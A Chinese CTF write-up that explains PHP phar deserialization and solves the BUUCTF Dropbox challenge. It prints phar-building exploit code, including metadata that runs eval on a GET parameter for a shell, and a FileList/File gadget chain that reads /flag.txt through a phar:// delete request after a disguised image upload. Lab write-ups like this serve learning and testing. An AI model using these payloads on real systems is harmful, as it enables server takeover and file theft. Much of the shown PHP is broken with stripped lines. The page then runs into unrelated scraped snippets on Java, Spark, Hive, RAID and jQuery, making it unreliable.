关于phar反序列化——BUUCTF[CISCN2019 华北赛区 Day1 Web1]Dropbox
先看看phar是啥https://blog.csdn.net/u011474028/article/details/54973571
简单的说,phar就是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// ,php://等类似,也是一种流包装器。
phar结构由 4 部分组成
stub
phar 文件标识,格式为 xxx;
manifest
压缩文件的属性等信息,以序列化存储;
contents
压缩文件的内容;
signature
签名,放在文件末尾;
这里有两个关键点: 一是文件标识,必须以__HALT_COMPILER();?>结尾,但前面的内容没有限制,也就是说我们可以轻易伪造一个图片文件或者pdf文件来绕过一些上传限制; 二是反序列化,phar存储的meta-data信息以序列化方式存储,当文件操作函数通过phar://伪协议解析phar文件时就会将数据反序列化 ,而这样的文件操作函数有很多。 直接来试试吧。 如果有文件test.php
output);
}
}
if(isset($_GET['filename']))
{
$filename=$_GET['filename'];
var_dump(file_exists($filename));
}
?>
生成phar的文件phar.phar可以这样写:
startBuffering(); //开始写文件
$phar->setStub(''); //写入stub
$o=new Testobj();
$o->output='eval($_GET["a"]);';
$phar->setMetadata($o);//写入meta-data
$phar->addFromString("test.txt","test"); //添加要压缩的文件
$phar->stopBuffering();
?>
这样,当我们访问phar.phpr时,将会生成test.phar的phar文件。之后再将其作为参数传到test.php中,就可getshell
利用条件: ① phar文件要能够上传到服务器端 ② 要有可用的魔术方法作为“跳板” ③ 要有文件操作函数,如file_exists(),fopen(),file_get_contents(),file() ③ 文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤
再来看看[CISCN2019 华北赛区 Day1 Web1]Dropbox这道题
进入题目随便注册一个账号,可以上传文件。 上传了之后可以删除和下载文件。 在下载文件的包中发现是通过post参数filename来进行的,所以尝试能不能进行任意文件下载。
修改filename可进行任意文件的下载(下载不了flag)。
于是下载网页源码,index.php,class.php,delete.php,ownload.php 注意到class.php中的Filelist类中的__destruct可以读取任意文件
public function __destruct() {
$table = '';
$table .= '';
foreach ($this->funcs as $func) {
$table .= '' . htmlentities($func) . ' ';
}
$table .= 'Opt ';
$table .= ' ';
foreach ($this->results as $filename => $result) {
$table .= '';
foreach ($result as $func => $value) {
$table .= '' . htmlentities($value) . ' ';
}
$table .= '下载 / 删除 ';
$table .= ' ';
}
echo $table;
}
class.php中的delete函数使用了unlink函数
public function detele() {
unlink($this->filename);
}
而delete.php中又调用了delete函数
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
综上,满足了phar反序列化利用的三个条件,所以可以使用phar反序列化来获取flag
生成phar文件的php代码:
filename=$name;
}
}
class FileList {
private $files;
public function __construct(){
$this->files=array(new File('/flag.txt'));
}
}
$o = new User();
$o->db =new FileList();
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("");
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
之后将生成的phar文件后缀改为jpg上传。 接下来再点击删除文件,将文件名改为phar://phar.jpg即可获得flag
你可能感兴趣的:(ctf_web)
CTF_Web:反序列化学习笔记(一)php中的类与对象
星辰照耀你我
CTF_Web php 类 unctf 安全 网络安全
0x00前言前期第一次遇到反序列化这方面题目的时候,也看了不少资料,都是前辈们写的总结,但是都是直接从在ctf中的运用开始的,自己在这段时间整理的过程中,发现对于php类与对象了解不是很多,导致在看一些题目、或值前辈的总结时都比较困难,下面参考php文档,结合自己对php类与对象的理解先把反序列化的基础知识做一下整理。0x01php类与对象class在php手册中这样介绍:每个类的定义都以关键字c
N1CTF Hard Php Write Up
32p8
N1CTFHardPhpWriteuphttps://github.com/wonderkun/CTF_web/tree/master/web600-1?1520941487499爆破目录,得到:configphp~index.php~user.phpconfig.php~文件存在源码泄露。index.php~');?>\r"""request1_data="""------WebKitFormB
CTF_Web:攻防世界新手区基础12题WP
星辰照耀你我
0x00前言Web新手区的12题全部是最基础的工具运用与实践,但也考核了一定的知识积累,最近刚好在重新刷这部分,将题解记录一下。0x01view_source题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。根据题目名称的提示,查看源代码,但右键被禁用,直接使用Ctrl+U,看到flag。0x02robots题目描述:X老师上课讲了Robots协议,小宁同学却上课
CTF_WEB学习-------------RCE之命令注入
r1ng_13
CTF笔记
CTF_WEB学习-------------RCE之命令注入REC什么是RCE?远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。RCE产生的原因?漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。RCE漏洞分类命令注
CTF_Web:php弱类型绕过与md5碰撞
星辰照耀你我
0x00前言md5碰撞只是一种掌握php弱类型的方式,弱类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。0x01什么是md5“MD5,即消息摘要算法(英语:MD5Message-DigestAlgorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出
CTF_Web:从0学习Flask模板注入(SSTI)
星辰照耀你我
CTF_Web flask python web unctf
0x01前言最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。0x02Flask简介Flask是一个Python编写的Web微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工
CTF_Web:文件包含与php伪协议
星辰照耀你我
前言在CTF题目中文件包含和伪协议使用也是常见的一类题目,常见的主要使用include()、require()等函数与其搭配产生可利用的漏洞或命令执行。0x01什么是文件包含在开发的过程中,开发人员为了更好地使用代码的重用性,不重复的去编写一部分函数,从而引入了文件包含函数,通过文件包含函数将文件包含进来,使用包含文件的代码,降低开发的代码工作量,在同一个文件里面可以包含另外一个或多个文件进而使用
CTF_Web:攻防世界高手区进阶题WP(1-4)
星辰照耀你我
0x00前言Web高手进阶区的题是对信息搜集、协议理解、php语法掌握等进阶知识的考查,越往后,题目越难,也不知道自己可以做到第几,持续更新吧。0x01baby_web题目描述:想想初始页面是哪个打开之后发现初始路径为1.php,平常我们使用最常见的首页面为index.php,输入url测试,发现立即跳转到了1.php,本题目考察302跳转的知识,使用burp抓包跟进即可。0x02Training
青少年CTF_WEB
Element_南笙
CTF WP python
web菜狗初学笔记Web签到目录扫描工具-dirsearch参数列表:-h,--help查看帮助-uURL,--url=URL设置url-LURLLIST,--url-list=URLLIST设置url列表-eEXTENSIONS,--extensions=EXTENSIONS网站脚本类型-wWORDLIST,--wordlist=WORDLIST设置字典-l,--lowercase小写-f,--
CTF_web杂记
aport
CTF_web1、PHP中md5()函数无法处理数组,如果传入的为数组,会返回NULL2、PHP有备份文件时,一般情况下时寻找.bak文件的3、碰撞当两个字符MD5加密后的值为0exxxx形式,就会被认为是科学计数法,且表示为0*10的x次方下面的字符串是MD5值都是0e开头的:QNKCDZO240610708s878926199as155964671as214587387as1091221200
CTF_Web:攻防世界高手区进阶题WP(5-8)
星辰照耀你我
持续更新ing0x05ics-06题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。打开题目发现只有报表管理可以点,答案就应该在这里面,但查询也是假的,url中存在参数id,但没有注入,不管怎么输入都不会报错,换几个id号试试,发现都有返回,联系题目被藏在了某一处,爆破id号。使用burp抓包进行id测试,生成1-10000的id号。在id=233
CTF_Web:攻防世界高手区进阶题WP(9-14)
星辰照耀你我
持续更新ing0x09PHP2题目只有一句话,Canyouanthenticatetothiswebsite?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。notallowed!");exit();}$_GET[id]=urldecode($_GET[id]);if($_GET[id]==
CTF_Web:php中的变量覆盖问题
星辰照耀你我
0x00前言最近一直在整理有哪些方面的基础考点,一共可能列了10项吧,自己也在不断学习,先把能想到的考点学完,带着这些常见问题再去重新学一次php的基础函数,然后再继续练习3分以上的题目,基础打牢,不管遇到什么都可以有自己的分析方式,而不是只能抄wp┭┮﹏┭┮。0x01什么是变量覆盖变量覆盖基本都来自于各种函数(parse_str()、extract()、import_request_variab
CTF_Web:反序列化学习笔记(一)php中的类与对象
星辰照耀你我
0x00前言前期第一次遇到反序列化这方面题目的时候,也看了不少资料,都是前辈们写的总结,但是都是直接从在ctf中的运用开始的,自己在这段时间整理的过程中,发现对于php类与对象了解不是很多,导致在看一些题目、或值前辈的总结时都比较困难,下面参考php文档,结合自己对php类与对象的理解先把反序列化的基础知识做一下整理。0x01php类与对象class在php手册中这样介绍:每个类的定义都以关键字c
CTF_Web:反序列化详解(二)CTF经典考题分析
星辰照耀你我
0x00CTF中的反序列化题目这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。0x01攻防世界unserialize3题目显示的源码为:classxctf{public$flag='111';publicfunction__wakeup(){exit('badrequests
CTF_Web长征路细刷题笔记
疯狂的1998
WEB 前端 php web安全
文件包含一、2018XCTFFINALS——babyphp二、WMCTF2020makephpgreatagain2.0三、强网杯2019随便注一、2018XCTFFINALS——babyphp知识点:涉及session的写入、变量覆盖0x01信息收集这题网上有很多人复现过了,但是我觉得他们写的Writeup有一些坑,稍有不慎就复现不了,就很头疼,开始写题打开环境可以看到几个关键点,首先便是看到有
文件上传的ctf_web题目【伪协议】
jessica1123
1.第一题Qiyu_20170807_210121.png文件包含题目:http://58.154.33.13:8004/index.php可以读到php源代码伪协议zip://archive.zip#1.phpphp://filter/read=convert.base64-encode//resource=indexindex.php后面是否需要添加后缀,要注意看浏览器地址栏的情况,本题用伪协
Docker
小小怪吃吃吃
【不定时更新】之前写过一篇用docker部署ctf_web题的文章,现在重新看来顿觉太过肤浅,这里在使用中不断记录也不断加深对docker的理解吧。刚开始可能会记录的有些乱,到后面再不断总结不断完善吧。Docker安装Ubuntu14.0416.04(使用apt-get进行安装)#step1:安装必要的一些系统工具sudoapt-getupdatesudoapt-get-yinstallapt-t
[CTF_web]exec/exec2.php
王一航
CTF_webCTF_web源码如下:21){die("ip长度错误!");}//DetermineOSandexecutethepingcommand.if(stristr(php_uname('s'),'WindowsNT')){//Windows$cmd=shell_exec('ping'.$ip);}else{//*nix$cmd=shell_exec('ping-c1'.$ip);}//
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏
2019年CTF比赛—3月赛 CTF_web
BSidesSF2019CTF_Web为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。本人能力、知识有限,如有错误不足之处,还请谅解!(趁着题目环境还在赶紧写一些。)比赛时间:2019年3月4日至2
学习周记(四)(上)
極品━═☆宏
CTF_web
CTF_Web周练习(二)从1月13日至1月25日,差不多快两周的时间没有碰这个东西了。好在考完了期末考试,现在有时间了,也该干干正事了,提高提高自己的能力,做点题,写点自己的wp与体会吧,一定要在寒假的时间做到每天进步一点点。I'mf***ingcoming!˙▽˙先写写自己的计划,一周的时间是七天,按照4、3分配,前四天中前两天做攻防世界的题,后两天做做其他平台的题;接下来的三天自己积累一些经
data:image/png;base64 ?一道关于Data URI Scheme的入门级CTF_Web题
c1ata
CTF
一道关于DataURIScheme的入门级CTF_Web题0x00题目描述这是偶尔遇到的某网安交流群的入群题,题目没有任何的提示,直接给了一个txt文件。0x01解题过程通过给的这个文件的名字,大致可以猜测和图片有关。我们先打开这个文本文件看看这里面有什么。data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANwAAAAoCAIAAAAaOwPZAAAAA
[CTF_web]exec/exec1.php
王一航
CTF_webCTF_web源码如下:'',';'=>'','|'=>'','-'=>'','$'=>'','('=>'',')'=>'','`'=>'','||'=>'',);//Removeanyofthecharactarsinthearray(blacklist).$target=str_replace(array_keys($substitutions),$substitutions,$
[CTF_web]exec/exec3.php
王一航
CTF_webCTF_web源码如下:分析这个challenge如果要写入一个shell的话必须要要求当前目录有写权限下面给出利用脚本利用代码:#!/usr/bin/envpython#encoding:utf-8importrequestsimportbase64url="http://127.0.0.1/CTF_web/exec/exec3.php"arg="c"defadd_slashes(
实验吧CTF_WEB(一)
风凉ZZ
更新ing~1.题目:你能跨过去吗?,你是在问我吗???你是在怀疑我的能力吗???解题链接:http://ctf1.shiyanbar.com/basic/xss/解答:点击链接后将URL进行UnEscape解密工具:http://tool.chinaz.com/Tools/Escape.aspx+/v+是UTF—7编码将ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKA
Enum用法
不懂事的小屁孩
enum
以前的时候知道enum,但是真心不怎么用,在实际开发中,经常会用到以下代码:
protected final static String XJ = "XJ";
protected final static String YHK = "YHK";
protected final static String PQ = "PQ";
【Spark九十七】RDD API之aggregateByKey
bit1129
spark
1. aggregateByKey的运行机制
/**
* Aggregate the values of each key, using given combine functions and a neutral "zero value".
* This function can return a different result type
hive创建表是报错: Specified key was too long; max key length is 767 bytes
daizj
hive
今天在hive客户端创建表时报错,具体操作如下
hive> create table test2(id string);
FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. MetaException(message:javax.jdo.JDODataSto
Map 与 JavaBean之间的转换
周凡杨
java 自省 转换 反射
最近项目里需要一个工具类,它的功能是传入一个Map后可以返回一个JavaBean对象。很喜欢写这样的Java服务,首先我想到的是要通过Java 的反射去实现匿名类的方法调用,这样才可以把Map里的值set 到JavaBean里。其实这里用Java的自省会更方便,下面两个方法就是一个通过反射,一个通过自省来实现本功能。
1:JavaBean类
1 &nb
java连接ftp下载
g21121
java
有的时候需要用到java连接ftp服务器下载,上传一些操作,下面写了一个小例子。
/** ftp服务器地址 */
private String ftpHost;
/** ftp服务器用户名 */
private String ftpName;
/** ftp服务器密码 */
private String ftpPass;
/** ftp根目录 */
private String f
web报表工具FineReport使用中遇到的常见报错及解决办法(二)
老A不折腾
finereport web报表 java报表 总结
抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。
出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。
1、没有返回数据集:
在存储过程中的操作语句之前加上set nocount on 或者在数据集exec调用存储过程的前面加上这句。当S
linux 系统cpu 内存等信息查看
墙头上一根草
cpu 内存 liunx
1 查看CPU
1.1 查看CPU个数
# cat /proc/cpuinfo | grep "physical id" | uniq | wc -l
2
**uniq命令:删除重复行;wc –l命令:统计行数**
1.2 查看CPU核数
# cat /proc/cpuinfo | grep "cpu cores" | u
Spring中的AOP
aijuans
spring AOP
Spring中的AOP
Written by Tony Jiang @ 2012-1-18 (转)何为AOP
AOP,面向切面编程。
在不改动代码的前提下,灵活的在现有代码的执行顺序前后,添加进新规机能。
来一个简单的Sample:
目标类:
[java]
view plain
copy
print
?
package&nb
placeholder(HTML 5) IE 兼容插件
alxw4616
JavaScript jquery jQuery插件
placeholder 这个属性被越来越频繁的使用.
但为做HTML 5 特性IE没能实现这东西.
以下的jQuery插件就是用来在IE上实现该属性的.
/**
* [placeholder(HTML 5) IE 实现.IE9以下通过测试.]
* v 1.0 by oTwo 2014年7月31日 11:45:29
*/
$.fn.placeholder = function
Object类,值域,泛型等总结(适合有基础的人看)
百合不是茶
泛型的继承和通配符 变量的值域 Object类转换
java的作用域在编程的时候经常会遇到,而我经常会搞不清楚这个
问题,所以在家的这几天回忆一下过去不知道的每个小知识点
变量的值域;
package 基础;
/**
* 作用域的范围
*
* @author Administrator
*
*/
public class zuoyongyu {
public static vo
JDK1.5 Condition接口
bijian1013
java thread Condition java多线程
Condition 将 Object 监视器方法(wait、notify和 notifyAll)分解成截然不同的对象,以便通过将这些对象与任意 Lock 实现组合使用,为每个对象提供多个等待 set (wait-set)。其中,Lock 替代了 synchronized 方法和语句的使用,Condition 替代了 Object 监视器方法的使用。
条件(也称为条件队列或条件变量)为线程提供了一
开源中国OSC源创会记录
bijian1013
hadoop spark MemSQL
一.Strata+Hadoop World(SHW)大会
是全世界最大的大数据大会之一。SHW大会为各种技术提供了深度交流的机会,还会看到最领先的大数据技术、最广泛的应用场景、最有趣的用例教学以及最全面的大数据行业和趋势探讨。
二.Hadoop
&nbs
【Java范型七】范型消除
bit1129
java
范型是Java1.5引入的语言特性,它是编译时的一个语法现象,也就是说,对于一个类,不管是范型类还是非范型类,编译得到的字节码是一样的,差别仅在于通过范型这种语法来进行编译时的类型检查,在运行时是没有范型或者类型参数这个说法的。
范型跟反射刚好相反,反射是一种运行时行为,所以编译时不能访问的变量或者方法(比如private),在运行时通过反射是可以访问的,也就是说,可见性也是一种编译时的行为,在
【Spark九十四】spark-sql工具的使用
bit1129
spark
spark-sql是Spark bin目录下的一个可执行脚本,它的目的是通过这个脚本执行Hive的命令,即原来通过
hive>输入的指令可以通过spark-sql>输入的指令来完成。
spark-sql可以使用内置的Hive metadata-store,也可以使用已经独立安装的Hive的metadata store
关于Hive build into Spark
js做的各种倒计时
ronin47
js 倒计时
第一种:精确到秒的javascript倒计时代码
HTML代码:
<form name="form1">
<div align="center" align="middle"
java-37.有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接
bylijinnan
java
public class MaxCatenate {
/*
* Q.37 有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接,
* 问这n 个字符串最多可以连成一个多长的字符串,如果出现循环,则返回错误。
*/
public static void main(String[] args){
mongoDB安装
开窍的石头
mongodb安装 基本操作
mongoDB的安装
1:mongoDB下载 https://www.mongodb.org/downloads
2:下载mongoDB下载后解压
 
[开源项目]引擎的关键意义
comsci
开源项目
一个系统,最核心的东西就是引擎。。。。。
而要设计和制造出引擎,最关键的是要坚持。。。。。。
现在最先进的引擎技术,也是从莱特兄弟那里出现的,但是中间一直没有断过研发的
 
软件度量的一些方法
cuiyadll
方法
软件度量的一些方法http://cuiyingfeng.blog.51cto.com/43841/6775/在前面我们已介绍了组成软件度量的几个方面。在这里我们将先给出关于这几个方面的一个纲要介绍。在后面我们还会作进一步具体的阐述。当我们不从高层次的概念级来看软件度量及其目标的时候,我们很容易把这些活动看成是不同而且毫不相干的。我们现在希望表明他们是怎样恰如其分地嵌入我们的框架的。也就是我们度量的
XSD中的targetNameSpace解释
darrenzhu
xml namespace xsd targetnamespace
参考链接:
http://blog.csdn.net/colin1014/article/details/357694
xsd文件中定义了一个targetNameSpace后,其内部定义的元素,属性,类型等都属于该targetNameSpace,其自身或外部xsd文件使用这些元素,属性等都必须从定义的targetNameSpace中找:
例如:以下xsd文件,就出现了该错误,即便是在一
什么是RAID0、RAID1、RAID0+1、RAID5,等磁盘阵列模式?
dcj3sjt126com
raid
RAID 1又称为Mirror或Mirroring,它的宗旨是最大限度的保证用户数据的可用性和可修复性。 RAID 1的操作方式是把用户写入硬盘的数据百分之百地自动复制到另外一个硬盘上。由于对存储的数据进行百分之百的备份,在所有RAID级别中,RAID 1提供最高的数据安全保障。同样,由于数据的百分之百备份,备份数据占了总存储空间的一半,因而,Mirror的磁盘空间利用率低,存储成本高。
Mir
yii2 restful web服务快速入门
dcj3sjt126com
PHP yii2
快速入门
Yii 提供了一整套用来简化实现 RESTful 风格的 Web Service 服务的 API。 特别是,Yii 支持以下关于 RESTful 风格的 API:
支持 Active Record 类的通用API的快速原型
涉及的响应格式(在默认情况下支持 JSON 和 XML)
支持可选输出字段的定制对象序列化
适当的格式的数据采集和验证错误
MongoDB查询(3)——内嵌文档查询(七)
eksliang
MongoDB查询内嵌文档 MongoDB查询内嵌数组
MongoDB查询内嵌文档
转载请出自出处:http://eksliang.iteye.com/blog/2177301 一、概述
有两种方法可以查询内嵌文档:查询整个文档;针对键值对进行查询。这两种方式是不同的,下面我通过例子进行分别说明。
二、查询整个文档
例如:有如下文档
db.emp.insert({
&qu
android4.4从系统图库无法加载图片的问题
gundumw100
android
典型的使用场景就是要设置一个头像,头像需要从系统图库或者拍照获得,在android4.4之前,我用的代码没问题,但是今天使用android4.4的时候突然发现不灵了。baidu了一圈,终于解决了。
下面是解决方案:
private String[] items = new String[] { "图库","拍照" };
/* 头像名称 */
网页特效大全 jQuery等
ini
JavaScript jquery css html5 ini
HTML5和CSS3知识和特效
asp.net ajax jquery实例
分享一个下雪的特效
jQuery倾斜的动画导航菜单
选美大赛示例 你会选谁
jQuery实现HTML5时钟
功能强大的滚动播放插件JQ-Slide
万圣节快乐!!!
向上弹出菜单jQuery插件
htm5视差动画
jquery将列表倒转顺序
推荐一个jQuery分页插件
jquery animate
swift objc_setAssociatedObject block(version1.2 xcode6.4)
啸笑天
version
import UIKit
class LSObjectWrapper: NSObject {
let value: ((barButton: UIButton?) -> Void)?
init(value: (barButton: UIButton?) -> Void) {
self.value = value
Aegis 默认的 Xfire 绑定方式,将 XML 映射为 POJO
MagicMa_007
java POJO xml Aegis xfire
Aegis 是一个默认的 Xfire 绑定方式,它将 XML 映射为 POJO, 支持代码先行的开发.你开发服 务类与 POJO,它为你生成 XML schema/wsdl
XML 和 注解映射概览
默认情况下,你的 POJO 类被是基于他们的名字与命名空间被序列化。如果
js get max value in (json) Array
qiaolevip
每天进步一点点 学习永无止境 max 纵观千象
// Max value in Array
var arr = [1,2,3,5,3,2];Math.max.apply(null, arr); // 5
// Max value in Jaon Array
var arr = [{"x":"8/11/2009","y":0.026572007},{"x"
XMLhttpRequest 请求 XML,JSON ,POJO 数据
Luob.
POJO json Ajax xml XMLhttpREquest
在使用XMlhttpRequest对象发送请求和响应之前,必须首先使用javaScript对象创建一个XMLHttpRquest对象。
var xmlhttp;
function getXMLHttpRequest(){
if(window.ActiveXObject){
xmlhttp:new ActiveXObject("Microsoft.XMLHTTP
jquery
wuai
jquery
以下防止文档在完全加载之前运行Jquery代码,否则会出现试图隐藏一个不存在的元素、获得未完全加载的图像的大小 等等
$(document).ready(function(){
jquery代码;
});
<script type="text/javascript" src="c:/scripts/jquery-1.4.2.min.js&quo